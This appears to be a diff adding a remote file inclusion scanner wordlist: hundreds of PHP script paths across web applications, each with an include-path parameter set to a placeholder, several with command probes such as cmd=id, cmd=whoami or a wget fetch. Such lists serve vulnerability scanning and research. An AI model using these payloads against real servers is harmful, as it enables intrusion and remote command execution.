+/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=XXpathXX
+/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=XXpathXX
+/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=XXpathXX?
+/administrator/menu_add.php?site_absolute_path=XXpathXX?
+/administrator/menu_operation.php?site_absolute_path=XXpathXX?
+/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=XXpathXX
+/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=XXpathXX?
+/adodb/adodb-errorpear.inc.php?ourlinux_root_path=XXpathXX
+/adodb/adodb-pear.inc.php?ourlinux_root_path=XXpathXX
+/adodb/adodb.inc.php?path=XXpathXX
+/advanced_comment_system/admin.php?ACS_path=XXpathXX?
+/advanced_comment_system/index.php?ACS_path=XXpathXX?
+/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=XXpathXX?
+/agenda.php3?rootagenda=XXpathXX
+/agenda2.php3?rootagenda=XXpathXX
+/aides/index.php?page=XXpathXX?
+/ains_main.php?ains_path=XXpathXX
+/ajax/loadsplash.php?full_path=XXpathXX
+/ajouter.php?include=XXpathXX?
+/akarru.gui/main_content.php?bm_content=XXpathXX
+/akocomments.php?mosConfig_absolute_path=XXpathXX
+/amazon/cart.php?cmd=add&asin=XXpathXX
+/amazon/index.php?lang=XXpathXX
+/amazon/info.php?asin=XXpathXX
+/annonce.php?page=XXpathXX?&cmd=id
+/announcements.php?phpraid_dir=XXpathXX
+/anzagien.php?config[root_ordner]=XXpathXX?cmd=id
+/apbn/templates/head.php?APB_SETTINGS[template_path]=XXpathXX
+/api.php?t_path_core=XXpathXX?&cmd=id
+/apps/apps.php?app=XXpathXX
+/appserv/main.php?appserv_root=XXpathXX
+/arab3upload/customize.php?path=XXpathXX?&cmd=pwd
+/arab3upload/initialize.php?path=XXpathXX?&cmd=pwd
+/arash_lib/class/arash_gadmin.class.php?arashlib_dir=XXpathXX
+/arash_lib/class/arash_sadmin.class.php?arashlib_dir=XXpathXX
+/arash_lib/include/edit.inc.php?arashlib_dir=XXpathXX
+/arash_lib/include/list_features.inc.php?arashlib_dir=XXpathXX
+/archive.php?scriptpath=XXpathXX?
+/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=XXpathXX%00
+/artlist.php?root_path=XXpathXX
+/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=XXpathXX?cmd
+/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX?
+/athena.php?athena_dir=XXpathXX
+/auction/auction_common.php?phpbb_root_path=XXpathXX
+/auction/includes/converter.inc.php?include_path=XXpathXX?
+/auction/includes/messages.inc.php?include_path=XXpathXX?
+/auction/includes/settings.inc.php?include_path=XXpathXX?
+/auction/phpAdsNew/view.inc.php?phpAds_path=XXpathXX
+/auth.cookie.inc.php?da_path=XXpathXX
+/auth.header.inc.php?da_path=XXpathXX
+/auth.sessions.inc.php?da_path=XXpathXX
+/auth/auth.php?phpbb_root_path=XXpathXX
+/auth/auth_phpbb/phpbb_root_path=XXpathXX
+/authenticate.php?default_path_for_themes=XXpathXX?
+/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=XXpathXX
+/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=XXpathXX
+/auto_check_renewals.php?installed_config_file=XXpathXX?cmd=ls
+/autoindex.php?cfg_file=XXpathXX?
+/awzmb/adminhelp.php?Setting[OPT_includepath]=XXpathXX
+/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=XXpathXX
+/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=XXpathXX
+/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=XXpathXX
+/awzmb/modules/help.incl.php?Setting[OPT_includepath]=XXpathXX
+/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=XXpathXX
+/axoverzicht.cgi?maand=XXpathXX
+/b2-tools/gm-2-b2.php?b2inc=XXpathXX
+/b2verifauth.php?index=XXpathXX?
+/backend/addons/links/index.php?PATH=XXpathXX
+/basebuilder/src/main.inc.php?mj_config[src_path]=XXpathXX???
+/bb_admin.php?includeFooter=XXpathXX
+/beacon/language/1/splash.lang.php?languagePath=XXpathXX
+/beacon/language/1/splash.lang.php?languagePath=XXpathXX?
+/belegungsplan/jahresuebersicht.inc.php?root=XXpathXX
+/belegungsplan/monatsuebersicht.inc.php?root=XXpathXX
+/belegungsplan/tagesuebersicht.inc.php?root=XXpathXX
+/belegungsplan/wochenuebersicht.inc.php?root=XXpathXX
+/bemarket/postscript/postscript.php?p_mode=XXpathXX
+/biblioteca/bib_form.php?CLASSPATH=XXpathXX
+/biblioteca/bib_pldetails.php?CLASSPATH=XXpathXX
+/biblioteca/bib_plform.php?CLASSPATH=XXpathXX
+/biblioteca/bib_plsearchc.php?CLASSPATH=XXpathXX
+/biblioteca/bib_plsearchs.php?CLASSPATH=XXpathXX
+/biblioteca/bib_save.php?CLASSPATH=XXpathXX
+/biblioteca/bib_searchc.php?CLASSPATH=XXpathXX
+/biblioteca/bib_searchs.php?CLASSPATH=XXpathXX
+/biblioteca/edi_form.php?CLASSPATH=XXpathXX
+/biblioteca/edi_save.php?CLASSPATH=XXpathXX
+/biblioteca/gen_form.php?CLASSPATH=XXpathXX
+/biblioteca/gen_save.php?CLASSPATH=XXpathXX
+/biblioteca/lin_form.php?CLASSPATH=XXpathXX
+/biblioteca/lin_save.php?CLASSPATH=XXpathXX
+/biblioteca/luo_form.php?CLASSPATH=XXpathXX
+/biblioteca/luo_save.php?CLASSPATH=XXpathXX
+/biblioteca/sog_form.php?CLASSPATH=XXpathXX
+/biblioteca/sog_save.php?CLASSPATH=XXpathXX
+/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX
+/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
+/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
+/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
+/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX?
+/bild.php?config[root_ordner]=XXpathXX?&cmd=id
+/bin/qte_init.php?qte_root=XXpathXX?
+/bingoserver.php3?response_dir=XXpathXX
+/block.php?Include=XXpathXX
+/blocks/birthday.php?full_path=XXpathXX
+/blocks/events.php?full_path=XXpathXX
+/blocks/help.php?full_path=XXpathXX
+/blogcms/admin/media.php?DIR_LIBS=XXpathXX?
+/blogcms/admin/xmlrpc/server.php?DIR_LIBS=XXpathXX?
+/blogcms/index.php?DIR_PLUGINS=XXpathXX?
+/board/post.php?qb_path=XXpathXX
+/boitenews4/index.php?url_index=XXpathXX?
+/books/allbooks.php?home=XXpathXX
+/books/home.php?home=XXpathXX
+/books/mybooks.php?home=XXpathXX
+/bp_ncom.php?bnrep=XXpathXX
+/bp_ncom.php?bnrep=XXpathXX?
+/bp_news.php?bnrep=XXpathXX
+/bridge/enigma/E2_header.inc.php?boarddir=XXpathXX?
+/bridge/yabbse.inc.php?sourcedir=XXpathXX
+/bridges/SMF/logout.php?path_to_smf=XXpathXX
+/bu/bu_cache.php?bu_dir=XXpathXX?
+/bu/bu_claro.php?bu_dir=XXpathXX?
+/bu/bu_parse.php?bu_dir=XXpathXX?
+/bu/process.php?bu_dir=XXpathXX?
+/buddy.php?CONFIG[MWCHAT_Libs]=XXpathXX?
+/builddb.php?env_dir=XXpathXX
+/button/settings_sql.php?path=XXpathXX
+/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=XXpathXX?
+/cal.func.php?dir_edge_lang=XXpathXX
+/calcul-page.php?home=XXpathXX
+/calendar.php?cfg_dir=XXpathXX?
+/calendar.php?lang=XXpathXX
+/calendar.php?path_to_calendar=XXpathXX
+/calendar.php?vwar_root=XXpathXX?
+/calendar/demo/index.php?date=&v=XXpathXX?
+/calendar/payment.php?insPath=XXpathXX
+/calendario/cal_insert.php?CLASSPATH=XXpathXX
+/calendario/cal_save.php?CLASSPATH=XXpathXX
+/calendario/cal_saveactivity.php?CLASSPATH=XXpathXX
+/cart.php?lang_list=XXpathXX
+/cart_content.php?cart_isp_root=XXpathXX
+/catalogg/inludes/include_once.php?include_file=XXpathXX
+/catalogshop.php?mosConfig_absolute_path=XXpathXX
+/cdsagenda/modification/SendAlertEmail.php?AGE=XXpathXX?
+/cfagcms/themes/default/index.php?main=XXpathXX
+/ch_readalso.php?read_xml_include=XXpathXX
+/challenge.php?vwar_root=XXpathXX
+/change_preferences2.php?target=XXpathXX?
+/chat.php?CONFIG[MWCHAT_Libs]=XXpathXX?
+/chat.php?my[root]=XXpathXX?cm=id
+/chat/adminips.php?banned_file=XXpathXX
+/chat/users_popupL.php3?From=XXpathXX
+/checkout.php?abs_path=XXpathXX
+/checkout.php?abs_path=XXpathXX?
+/ciamos_path/modules/forum/include/config.php?module_cache_path='XXpathXX'
+/circ.php?include_path=XXpathXX?
+/circolari/cir_save.php?CLASSPATH=XXpathXX
+/citywriter/head.php?path=XXpathXX?
+/cl_files/index.php?path_to_calendar=XXpathXX?
+/claroline/auth/ldap/authldap.php?includePath=XXpathXX
+/claroline/phpbb/page_tail.php?includePath=XXpathXX
+/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=XXpathXX?
+/class.mysql.php?path_to_bt_dir=XXpathXX
+/class/Wiki/Wiki.php?c_node[class_path]=XXpathXX
+/class/jpcache/jpcache.php?_PSL[classdir]=XXpathXX?exec=uname
+/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
+/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=XXpathXX
+/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=XXpathXX
+/classes/Cache.class.php?rootdir=XXpathXX?
+/classes/Customer.class.php?rootdir=XXpathXX?
+/classes/Performance.class.php?rootdir=XXpathXX?
+/classes/Project.class.php?rootdir=XXpathXX?
+/classes/Representative.class.php?rootdir=XXpathXX?
+/classes/User.class.php?rootdir=XXpathXX?
+/classes/admin_o.php?absolutepath=XXpathXX
+/classes/adodbt/sql.php?classes_dir=XXpathXX
+/classes/adodbt/sql.php?classes_dir=XXpathXX?
+/classes/board_o.php?absolutepath=XXpathXX
+/classes/class_admin.php?PathToComment=XXpathXX?
+/classes/class_comments.php?PathToComment=XXpathXX?
+/classes/class_mail.inc.php?path_to_folder=XXpathXX
+/classes/common.php?rootdir=XXpathXX?
+/classes/core/language.php?rootdir=XXpathXX
+/classes/dev_o.php?absolutepath=XXpathXX
+/classes/file_o.php?absolutepath=XXpathXX
+/classes/html/com_articles.php?absolute_path=XXpathXX
+/classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX
+/classes/query.class.php?baseDir=XXpathXX
+/classes/tech_o.php?absolutepath=XXpathXX
+/classified.php?insPath=XXpathXX
+/classified_right.php?language_dir=XXpathXX
+/classifieds/index.php?lowerTemplate=XXpathXX
+/clear.php?bibtexrootrel=XXpathXX?
+/clearinfo.php?bibtexrootrel=XXpathXX?
+/click.php?dir=XXpathXX?
+/client.php?dir=XXpathXX
+/client/faq_1/PageController.php?dir=XXpathXX
+/clients/index.php?src=XXpathXX
+/cls_fast_template.php?fname=XXpathXX
+/cm68news/engine/oldnews.inc.php?addpath=XXpathXX?&
+/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=XXpathXX?
+/cms/meetweb/classes/ManagerResource.class.php?root_path=XXpathXX
+/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=XXpathXX
+/cms/meetweb/classes/RegForm.class.php?root_path=XXpathXX
+/cms/meetweb/classes/RegResource.class.php?root_path=XXpathXX
+/cms/meetweb/classes/RegRightsResource.class.php?root_path=XXpathXX
+/cms/meetweb/classes/modules.php?root_path=XXpathXX
+/cms/modules/form.lib.php?sourceFolder=XXpathXX?
+/cms/system/openengine.php?oe_classpath=XXpathXX???
+/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=XXpathXX?
+/cn_config.php?tpath=XXpathXX?
+/coast/header.php?sections_file=XXpathXX?
+/code/berylium-classes.php?beryliumroot=XXpathXX?
+/code/display.php?admindir=XXpathXX?
+/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=XXpathXX
+/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
+/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=XXpathXX?
+/com_media_library/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
+/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
+/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
+/comments.php?AMG_serverpath=XXpathXX
+/comments.php?scriptpath=XXpathXX?
+/common.inc.php?CFG[libdir]=XXpathXX
+/common.inc.php?CFG[libdir]=XXpathXX?
+/common.inc.php?base_path=XXpathXX
+/common.php?db_file=XXpathXX
+/common.php?dir=XXpathXX
+/common.php?ezt_root_path=XXpathXX?
+/common.php?include_path=XXpathXX
+/common.php?livealbum_dir=XXpathXX?
+/common.php?locale=XXpathXX
+/common.php?phpht_real_path=XXpathXX?
+/common/db.php?commonpath=XXpathXX?
+/common/func.php?CommonAbsD=XXpathXX?
+/common/func.php?CommonAbsDir=XXpathXX
+/community/Offline.php?sourcedir=XXpathXX?
+/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=XXpathXX
+/components/calendar/com_calendar.php?absolute_path=XXpathXX?
+/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
+/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=XXpathXX
+/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=XXpathXX
+/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=XXpathXX
+/components/com_articles.php?absolute_path=XXpathXX?
+/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=XXpathXX
+/components/com_calendar.php?absolute_path=XXpathXX?
+/components/com_cpg/cpg.php?mosConfig_absolute_path=XXpathXX?
+/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=XXpathXX
+/components/com_facileforms/facileforms.frame.php?ff_compath=XXpathXX
+/components/com_forum/download.php?phpbb_root_path=XXpathXX
+/components/com_galleria/galleria.html.php?mosConfig_absolute_path=XXpathXX
+/components/com_guestbook.php?absolute_path=XXpathXX?
+/components/com_hashcash/server.php?mosConfig_absolute_path=XXpathXX?
+/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=XXpathXX
+/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=XXpathXX
+/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=XXpathXX
+/components/com_joomlaboard/file_upload.php?sbp=XXpathXX?
+/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=XXpathXX?
+/components/com_lm/archive.php?mosConfig_absolute_path=XXpathXX?
+/components/com_mambowiki/MamboLogin.php?IP=XXpathXX?
+/components/com_minibb.php?absolute_path=XXpathXX
+/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=XXpathXX
+/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=XXpathXX
+/components/com_mospray/scripts/admin.php?basedir=XXpathXX?&cmd=id
+/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=XXpathXX
+/components/com_mp3_allopass/allopass.php?mosConfig_live_site=XXpathXX
+/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX?
+/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=XXpathXX?
+/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=XXpathXX
+/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX
+/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=XXpathXX
+/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=XXpathXX
+/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=XXpathXX
+/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=XXpathXX?
+/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=XXpathXX
+/components/com_smf/smf.php?mosConfig_absolute_path=XXpathXX
+/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=XXpathXX
+/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=XXpathXX
+/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=XXpathXX
+/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=XXpathXX
+/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=XXpathXX
+/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=XXpathXX
+/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=XXpathXX
+/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=XXpathXX
+/components/core/connect.php?language_path=XXpathXX
+/components/minibb/bb_plugins.php?absolute_path=XXpathXX?
+/components/minibb/index.php?absolute_path=XXpathXX?
+/components/xmlparser/loadparser.php?absoluteurl=XXpathXX
+/compteur/mapage.php?chemin=XXpathXX
+/conf.php?securelib=XXpathXX
+/conf.php?securelib=XXpathXX?
+/config.inc.php3?rel_path=XXpathXX
+/config.inc.php?_path=XXpathXX
+/config.inc.php?path_escape=XXpathXX
+/config.inc.php?path_escape=XXpathXX%00
+/config.php?full_path=XXpathXX?
+/config.php?full_path_to_db=XXpathXX
+/config.php?fullpath=XXpathXX
+/config.php?incpath=XXpathXX
+/config.php?path_to_root=XXpathXX
+/config.php?rel_path=XXpathXX?
+/config.php?returnpath=XXpathXX
+/config.php?sql_language=XXpathXX?
+/config.php?xcart_dir=XXpathXX?
+/config/config_admin.php?INC=XXpathXX?
+/config/config_main.php?INC=XXpathXX?
+/config/config_member.php?INC=XXpathXX?
+/config/dbutil.bck.php?confdir=XXpathXX
+/config/mysql_config.php?INC=XXpathXX?
+/config/sender.php?ROOT_PATH=XXpathXX?
+/configuration.php?absolute_path=XXpathXX?
+/confirmUnsubscription.php?output=XXpathXX
+/connect.php?path=XXpathXX
+/connexion.php?DOCUMENT_ROOT=XXpathXX?
+/contact.php?blog_theme=XXpathXX
+/contacts.php?cal_dir=XXpathXX
+/contenido/external/frontend/news.php?cfg[path][includes]=XXpathXX
+/content.php?content=XXpathXX
+/content/admin.php?pwfile=XXpathXX
+/content/content.php?fileloc=XXpathXX?
+/content/delete.php?pwfile=XXpathXX
+/content/modify.php?pwfile=XXpathXX
+/content/modify_go.php?pwfile=XXpathXX
+/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=XXpathXX
+/contrib/mx_glance_sdesc.php?mx_root_path=XXpathXX
+/contrib/phpBB2/modules.php?phpbb_root_path=XXpathXX?
+/controllers/MySQLController.php?baseDir=XXpathXX
+/controllers/SQLController.php?baseDir=XXpathXX
+/controllers/SetupController.php?baseDir=XXpathXX
+/controllers/VideoController.php?baseDir=XXpathXX
+/controllers/ViewController.php?baseDir=XXpathXX
+/convert-date.php?cal_dir=XXpathXX
+/convert/mvcw.php?step=1&vwar_root=XXpathXX
+/convert/mvcw.php?vwar_root=XXpathXX
+/core/admin/admin.php?p=admin&absoluteurlXXpathXX
+/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurlXXpathXX
+/core/admin/categories_add.php?absoluteurlXXpathXX
+/core/admin/categories_remove.php?absoluteurlXXpathXX
+/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurlXXpathXX
+/core/admin/editdel.php?p=admin&absoluteurlXXpathXX
+/core/admin/ftpfeature.php?p=admin&absoluteurlXXpathXX
+/core/admin/login.php?absoluteurlXXpathXX
+/core/admin/pgRSSnews.php?absoluteurlXXpathXX
+/core/admin/showcat.php?absoluteurlXXpathXX
+/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurlXXpathXX
+/core/archive_cat.php?absoluteurlXXpathXX
+/core/archive_nocat.php?absoluteurlXXpathXX
+/core/aural.php?site_absolute_path=XXpathXX
+/core/aural.php?site_absolute_path=XXpathXX?&cmd=dir
+/core/editor.php?editor_insert_bottom=XXpathXX
+/core/includes.php?CMS_ROOT=XXpathXX?
+/core/recent_list.php?absoluteurlXXpathXX
+/corpo.php?pagina=XXpathXX
+/cp2.php?securelib=XXpathXX?
+/cpe/index.php?repertoire_config=XXpathXX
+/crea.php?plancia=XXpathXX
+/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=XXpathXX?
+/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=XXpathXX?
+/creat_news_all.php?language=XXpathXX
+/create_file.php?target=XXpathXX?
+/cron.php?ROOT_PATH=XXpathXX
+/cron.php?include_path=XXpathXX?
+/crontab/run_billing.php?config[include_dir]=XXpathXX?
+/cross.php?url=XXpathXX
+/custom_vars.php?sys[path_addon]=XXpathXX
+/customer/product.php?xcart_dir=XXpathXX
+/cwb/comanda.php?INCLUDE_PATH=XXpathXX?
+/datei.php?config[root_ordner]=XXpathXX?&cmd=id
+/db/PollDB.php?CONFIG_DATAREADERWRITER=XXpathXX?
+/db/mysql/db.inc.php?SPL_CFG[dirroot]=XXpathXX?
+/dbcommon/include.php?_APP_RELATIVE_PATH=XXpathXX
+/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=XXpathXX
+/debugger.php?config_atkroot=XXpathXX
+/decoder/gallery.php?ccms_library_path=XXpathXX
+/decoder/markdown.php?ccms_library_path=XXpathXX
+/defaults_setup.php?ROOT_PATH=XXpathXX?cmd=ls
+/defines.php?WEBCHATPATH=XXpathXX?
+/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=XXpathXX&
+/depouilg.php3?NomVote=XXpathXX?
+/development.php?root_prefix=XXpathXX?
+/dfcode.php?DFORUM_PATH=XXpathXX?
+/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=XXpathXX?
+/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=XXpathXX?
+/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX
+/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX?
+/dialog.php?CONFIG[MWCHAT_Libs]=XXpathXX?
+/dialogs/a.php?spaw_dir=XXpathXX?&cmd=id
+/dialogs/collorpicker.php?spaw_dir=XXpathXX&cmd=id
+/dialogs/img.php?spaw_dir=XXpathXX?&cmd=id
+/dialogs/img_library.php?spaw_dir=XXpathXX?&cmd=id
+/dialogs/table.php?spaw_dir=XXpathXX?&cmd=id
+/dialogs/td.php?spaw_dir=XXpathXX?&cmd=id
+/digitaleye_Path/module.php?menu=XXpathXX?
+/dir/prepend.php?_PX_config[manager_path]=XXpathXX
+/dir_thatware/config.php?root_path=XXpathXX'
+/direct.php?rf=XXpathXX
+/direction/index.php?repertoire_config=XXpathXX
+/directory/index.php?path=XXpathXX
+/display.php?pag=XXpathXX
+/display.php?path=XXpathXX
+/displayCategory.php?basepath=XXpathXX
+/dix.php3?url_phpartenaire=XXpathXX
+/dm-albums/template/album.php?SECURITY_FILE=XXpathXX
+/doc/admin/index.php?ptinclude=XXpathXX
+/doceboCore/lib/lib.php?GLOBALS[where_framework]=XXpathXX
+/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=XXpathXX
+/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=XXpathXX
+/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=XXpathXX
+/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=XXpathXX
+/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=XXpathXX
+/docs/front-end-demo/cart2.php?workdir=XXpathXX?
+/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=XXpathXX?&cmd=wget%20XXpathXX
+/dosearch.php?RESPATH=XXpathXX
+/download.php?root_prefix=XXpathXX?
+/download_engine_V1.4.3/addmember.php?eng_dir=XXpathXX
+/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=XXpathXX
+/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=XXpathXX
+/downstat1.8/chart.php?art=XXpathXX?
+/dp_logs.php?HomeDir=XXpathXX
+/eXPerience2/modules.php?file=XXpathXX
+/ea-gBook/index_inc.php?inc_ordner=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
+/edit.php?javascript_path=XXpathXX?
+/editor.php?newsfile=XXpathXX
+/editprofile.php?pathtohomedir=XXpathXX?
+/editsite.php?returnpath=XXpathXX
+/editx/add_address.php?include_dir=XXpathXX
+/elseif/contenus.php?contenus=XXpathXX
+/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=XXpathXX
+/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=XXpathXX
+/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=XXpathXX
+/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=XXpathXX
+/elseif/moduleajouter/depot/usrdepot.php?corpsdesignXXpathXX
+/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=XXpathXX
+/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=XXpathXX
+/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=XXpathXX
+/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=XXpathXX
+/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=XXpathXX
+/email_subscribe.php?root_prefix=XXpathXX?
+/embed/day.php?path=XXpathXX
+/enc/content.php?Home_Path=XXpathXX?
+/engine/Ajax/editnews.php?root_dir=XXpathXX
+/engine/api/api.class.php?dle_config_api=XXpathXX?
+/engine/engine.inc.php?absolute_path=XXpathXX
+/engine/init.php?root_dir=XXpathXX
+/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=XXpathXX?
+/enth3/show_joined.php?path=XXpathXX
+/environment.php?DIR_PREFIX=XXpathXX
+/epal/index.php?view=XXpathXX?
+/errors.php?error=XXpathXX
+/errors/configmode.php?GALLERY_BASEDIR=XXpathXX
+/errors/needinit.php?GALLERY_BASEDIR=XXpathXX
+/errors/reconfigure.php?GALLERY_BASEDIR=XXpathXX
+/errors/unconfigured.php?GALLERY_BASEDIR=XXpathXX
+/es_custom_menu.php?files_dir=XXpathXX
+/es_desp.php?files_dir=XXpathXX
+/es_offer.php?files_dir=XXpathXX
+/eshow.php?Config_rootdir=XXpathXX
+/esupport/admin/autoclose.php?subd=XXpathXX?
+/eva/index.php3?aide=XXpathXX?
+/eva/index.php3?perso=XXpathXX
+/eva/index.php?eva[caminho]=XXpathXX
+/event.php?myevent_path=XXpathXX
+/event_cal/module/embed/day.php?path=XXpathXX
+/eventcal2.php.php?path_simpnews=XXpathXX
+/eventscroller.php?path_simpnews=XXpathXX
+/example-view/templates/article.php?globals[content_dir]=XXpathXX?
+/example-view/templates/dates_list.php?globals[content_dir]=XXpathXX?
+/example-view/templates/root.php?globals[content_dir]=XXpathXX?
+/example.php?site=XXpathXX
+/example/gamedemo/inc.functions.php?projectPath=XXpathXX?
+/examplefile.php?bibtexrootrel=XXpathXX?
+/examples/patExampleGen/bbcodeSource.php?example=XXpathXX
+/exception/include.php?_APP_RELATIVE_PATH=XXpathXX
+/extauth/drivers/ldap.inc.php?clarolineRepositorySys=XXpathXX
+/extras/mt.php?web_root=XXpathXX
+/extras/poll/poll.php?file_newsportal=XXpathXX
+/ezusermanager_pwd_forgott.php?ezUserManager_Path=XXpathXX
+/faq.php?module_root_path=XXpathXX
+/faq.php?phpbb_root_path=XXpathXX
+/fckeditor/editor/dialog/fck_link.php?dirroot=XXpathXX
+/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=XXpathXX
+/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=XXpathXX?&cmd=id
+/fcring.php?s_fuss=XXpathXX
+/feed.php?config[root_ordner]=XXpathXX?&cmd=id
+/feed/index2.php?m=XXpathXX
+/files/amazon-bestsellers.php?CarpPath=XXpathXX
+/files/carprss.php?CarpPath=XXpathXX
